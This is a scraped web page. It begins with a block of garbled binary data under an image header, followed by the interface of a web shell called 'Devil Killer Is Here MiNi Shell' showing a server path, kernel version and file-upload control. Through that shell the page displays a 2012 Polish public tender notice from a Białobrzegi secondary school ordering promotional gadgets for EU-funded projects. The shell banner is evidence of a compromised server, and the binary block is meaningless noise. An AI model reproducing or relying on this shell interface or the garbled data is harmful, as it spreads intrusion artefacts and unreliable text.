JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/121598-N-2012.html

<p class="kh_header"><b>Białobrzegi: Dostawa gadżetów promocyjnych w ramach realizacji przez Zespół Szkół Ponadgimnazjalnych w Białobrzegach projektów Dobra Szkoła - Blisko Domu oraz Innowacja Edukacyjna Zdrowie Sport Uroda współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 121598 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych w Białobrzegach , ul. Żeromskiego 86, 26-800 Białobrzegi, woj. mazowieckie, tel. 048 613 27 10, faks 048 613 45 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspbialobrzegi.edu.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gadżetów promocyjnych w ramach realizacji przez Zespół Szkół Ponadgimnazjalnych w Białobrzegach projektów Dobra Szkoła - Blisko Domu oraz Innowacja Edukacyjna Zdrowie Sport Uroda współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1 Projekt Innowacja Edukacyjna - Zdrowie Sport Uroda 500 kompletów gadżetów promocyjnych:
i)	60 kompletów na które składają się następujące elementy: Zestaw piśmienniczy składający się z pióra wiecznego z niebieskim nabojem i długopisu z niebieskim wkładem. Obudowa metalowa kolor czarny z metalowym klipsem oraz obrączkami w kolorze srebrnym Zapakowane w eleganckie pudełko wyłożone w środku materiałem. Logo grawerowane na długopisie oraz piórze + dodatkowo znakowanie na opakowaniu 60 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 60 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 60 sztuk
ii)	100 kompletów na które składają się następujące elementy: Fartuchy (czarne 35 szt. + kolor burgund 35 szt. + zielone 30 szt.) Długi fartuch (rozmiar min. 70 cm szerokość x 100 cm długość), sięgający za kolana zakładany przez głowę, wyposażony w troki umożliwiające zawiązanie z tyłu. Dwie duże przednie kieszenie . Wykonany z dobrego gatunkowo materiału typu mieszanka (65% poliester+35% bawełna). W trzech kolorach czerwonym, czarnym, zielonym, Nadruk z przodu nad kieszeniami 100 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 100 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 100 sztuk
iii)	60 kompletów na które składają się następujące elementy: Bluzy z kapturem (żółty+szary oraz czarny+szary) dwukolorowa żółto-szara wersja damska (rozmiary S 5 szt., M 10 szt., L 10 szt., XL 5 szt.) oraz czarno-szara wersja męska (rozmiary S 5 szt., M 10 szt., L 10 szt., XL 5 szt.), skład ok. 50% poliestru/50% bawełny. Gruby materiał, bardzo dobrej jakości ok. 380gm2, kieszenie boczne zamykane na suwaki, kaptur ze sznurkiem do ściągania w kontrastowym kolorze. Modny krój. Zapinana na suwak. Rękawy wykończone ściągaczami. Wersja damska ze wcięciami w tali, dopasowany krój. Logo haft, nadruk, aplikacja. 60 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 60 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 60 sztuk
iv)	100 kompletów na które składają się następujące elementy: Czapka z daszkiem 100% bawełna, regulowana z tyłu paskiem zakończonym rzepem, laminowany wzmocniony przedni panel, daszek wygięty, przeszyty, dwukolorowa: czarno- pomarańczowa. Przednie panele w kolorze pomarańczowym, tylne panele w kolorze czarnym, wierzch daszka w kolorze pomarańczowym, spód daszka w kolorze czarnym. Haft na przednim panelu oraz nadruk na boku czapki. Haft lub aplikacja z drukowanego flocka 100 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 100 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 100 sztuk
v)	40 kompletów na które składają się następujące elementy: Plecak pojemności ok. 36-38 litrów z możliwością regulacji pojemności specjalnymi paskami. Wymiary ok.59cm x40cmx20cm, zabezpieczenia przed przypadkowym otwarciem specjalnymi paskami zamykanymi na plastikowe klamry, pas biodrowy, 3 kieszenie przednie zamykane na suwaki, profilowane miękkie szelki, wzmocniony uchwyt górny, oddychająca tkanina na plecach, materiał nieprzemakalny typu Codura, wytrzymały na ścieranie. Kolor szaro -pomarańczowy. Nadruk logo sitotransfer lub drukowany flock aplikacja 40 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 40 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 40 sztuk
vi)	100 kompletów na które składają się następujące elementy: Pamięć USB w kształcie breloka do kluczy,  wykonana z miękkiego sylikonu, przypominająca w kształcie kroplę wody, zakończona metalowym kółkiem umożliwiającym przypięcie kluczy, wtyczka pamięci  umiejscowiona na jednym z końców silikonowej pętli, wtykana w metalowe gniazdo z drugiej strony.  Kolor pomarańczowo srebrny, Pojemność 4GB Logo nadrukowane na obudowie Tampodruk 100 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 100 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 100 sztuk
vii)	40 kompletów na które składają się następujące elementy: Pulsomert Urządzenie do pomiaru pulsu. Kolor obudowy pomarańczowy, możliwość założenia na ramię za pomocą specjalnej opaski z miękkiego tworzywa, w urządzeniu opcja pomiaru czasu, stoper, zegarek oraz budzik. Duży wielofunkcyjny wyświetlacz kwarcowy. Rozmiar ok. 4cm x 4cm nadruk na obudowie tampodruk 40 sztuk + Długopis plastikowy w kolorze pomarańczowym, lub niebieskim z metalowym klipsem oraz srebrną odkręcana końcówką. Mechanizm włączający pstrykany, guzik w kolorze srebrnym, nadruk z dwóch stron jednokolorowy. Nadruk tampondruk 40 sztuk + Torba papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby biały, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały. 40 sztuk

CZEŚĆ 2 Projekt Dobra Szkoła - Blisko Domu 500 sztuk gadżetów promocyjnych:
i)	Kubek termiczny z uchem Podwójne ścianki, stal nierdzewna, wewnątrz plastik, Opaska z metalu błyszczącego dookoła kubka,  elegancki kształt wcięcie w górnej części kubka, Zakrywka z uszczelką.  Pojemność ok. 480ml. Logo grawerowane. 60 sztuk
ii)	Kurtka poliestrowa (rozmiary S 20 szt., M 30 szt., L 30 szt., XL 15 szt., XXL 5 szt.) Lekka kurtka wiatrówka, przeciwdeszczowa z kapturem chowanym w kołnierz. Kołnierz typu stójka. Na dole kurtki troki ściągające, rękawy zakończone ściągaczami w gumkę. 100% poliester z podszewką wprasowaną od środka. Dwie kieszenie zewnętrzne z klapami, zamykana na suwak. Kurtka spakowana w specjalną torebkę zamykaną na trok z plastikowym zapięciem.  Kolor kurtki granatowy i srebrny Nadruk na lewej piersi. 100 sztuk
iii)	Filiżanka ze spodkiem Filiżanka ze spodkiem w kolorze białym. Pojemność ok. 170ml, spodek okrągły, ucho w kształcie połowy serca,  Kształt filiżanki lekko wygięty jak żagiel, wąska na dole rozszerzająca się ku górze,  zapakowana w indywidualny kartonik. Nadruk dookoła filiżanki oraz pod spodem spodka metodą kalki ceramicznej 4 kolory. Nadruk kalka ceramiczna. 60 sztuk
iv)	Rozgałęziacz USB Rozgałęziacz USB, składany cztero portowy, kolor biały, tworzywo miłe w dotyku typu ABS, kształt prostokąt z czterema wtyczkami w każdym narożniku na krótkich kabelkach, kabel główny doprowadzony do krótszego boku prostokąta głównego zakończony krążkiem, wyposażony w diodę sygnalizującą zasilanie, nadruk wielokolorowy na obudowie głównej. Nadruk wielokolorowy. 80 sztuk
v)	Koszule (szare męskie rozmiary S 5 szt., M 10 szt., L 10 szt., XL 5 szt. i białe damskie rozmiary M 15 szt., L 10 szt., XL 5 szt.)  długi rękaw, dopasowana do sylwetki. Wykonana z bardzo dobrej jakości materiału typu mieszanka (97% bawełna + 3% elastan) Gramatura dzianiny 110-120g. zapinana na guziczki w odcieniu perłowym. Długie, usztywnione mankiety. Kolor biały oraz szary. Nadruk na lewej piersi. 60 sztuk
vi)	Repliki piłki EURO2012 rozmiar 5, kolor biały, piłka treningowa. Z powłoką bawełnianą pomiędzy balonem a warstwą wierzchnią. Wykonana z wysokiej jakości  materiałów syntetycznych, bezszwowa budowa TSBE. Zawór zwrotny butylowy. Waga ok. 430g Przeznaczona na trawiaste boiska. Piłka powinna posiadać certyfikat FIFA Inspected. Nadruk na opakowaniu logo. 20 sztuk
vii)	Czapka z daszkiem 100% bawełna, regulowana z tyłu paskiem zakończonym rzepem, laminowany wzmocniony przedni panel, daszek wygięty, przeszyty, dwukolorowa: czarno- pomarańczowa. Przednie panele w kolorze pomarańczowym, tylne panele w kolorze czarnym, wierzch daszka w kolorze pomarańczowym, spód daszka w kolorze czarnym. Haft na przednim panelu oraz nadruk na boku czapki. Haft lub aplikacja z drukowanego flocka 60 sztuk
viii)	Słuchawki, w kolorze białym i czarnym, Zamontowane na opasce, posiadające skóropodobne poduszki izolujące, modny kształt kabel zasilający z jednej strony minimum 110cm długości, opaska na głowę z tworzywa z możliwością regulacji, nadruk na obudowie słuchawki. 60 sztuk
KAŻDY GADŻET powinien być zapakowany w torbę papierowa z napisem Format A4+ ok.  24 x 10 x 33 pionowa, kolor torby granatowy, nadruk 1 strona CMYK. Papier offset  biały  gładki  190gr lub  biały  prążkowany  110g. Uchwyt papierowy  skręcany  wklejany  do  wnętrza  biały..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia o spełnianiu warunków udziału w postępowaniu oraz o spełnianiu warunków zawartych w art. 22 ust. 1 pkt 1 - 4 Pzp. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór
Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły 1/0 (spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodni e z art.26 ust 2b ustawy pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Kopie dokumentów załączonych do oferty dotyczących tych podmiotów są poświadczane za zgodność z oryginałem przez te podmioty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie przez Wykonawcę, iż gwarantuje w okresie gwarancji i rękojmi (który nie może być krótszy niż 24 miesiące) usunięcie na własny koszt i we własnym zakresie zgłoszonych przez Zamawiającego wady i usterki. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór.
Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia o spełnianiu warunków serwisu technicznego według formuły 1/0 (spełnia/nie spełnia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia Wykonawcy iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór.
Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia według formuły 1/0 (spełnia/nie spełnia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Przedłożenie szczegółowej dokumentacji oferowanych gadżetów promocyjnych zawierającej: 
- WZÓR KAŻDEGO z oferowanych rodzajów gadżetów promocyjnych w postaci identycznej z gadżetem który oferent zamierza dostarczyć po podpisaniu umowy tj. zestaw piśmienniczy, fartuch (czarny lub czerwony lub zielony), bluza z kapturem (żółty+szary lub czarny+szary), długopis plastikowy (pomarańczowy lub niebieski), czapka z daszkiem (czarno- pomarańczowa), plecak pojemności ok. 36-38 l, pamięć USB w kształcie breloka, pulsometr, torba papierowa z napisem Format A4, kubek termiczny z uchem, kurtka poliestrowa (kolor granatowy lub srebrny), filiżanka ze spodkiem, rozgałęziacz USB cztero-portowy, koszula (szare lub białe), replika piłki EURO2012 rozmiar 5, kolor biały, słuchawki (w kolorze białym lub czarnym)
- gabaryty, 
- wagę, 
- materiały z których został wykonany,
- specyficzne warunki użytkowania (jeśli dotyczy)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Parafowany przez upełnomocnionego przedstawiciela Wykonawcy projekt umowy (załącznik nr 6 do SIWZ)
2) Oferta na wykonanie zamówienia publicznego (Zał. nr 1 do SIWZ)
3) Dokumentów potwierdzających uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.7</li>
<li>2 - Ocena jakościowa - 0.3</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspbialobrzegi.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych w Białobrzegach
ul. Żeromskiego 86
26-800 Białobrzegi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 08:15, miejsce: Zespół Szkół Ponadgimnazjalnych w Białobrzegach
ul. Żeromskiego 86
26-800 Białobrzegi.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektów Dobra Szkoła - Blisko Domu oraz Innowacja Edukacyjna Zdrowie Sport Uroda współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach,
Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
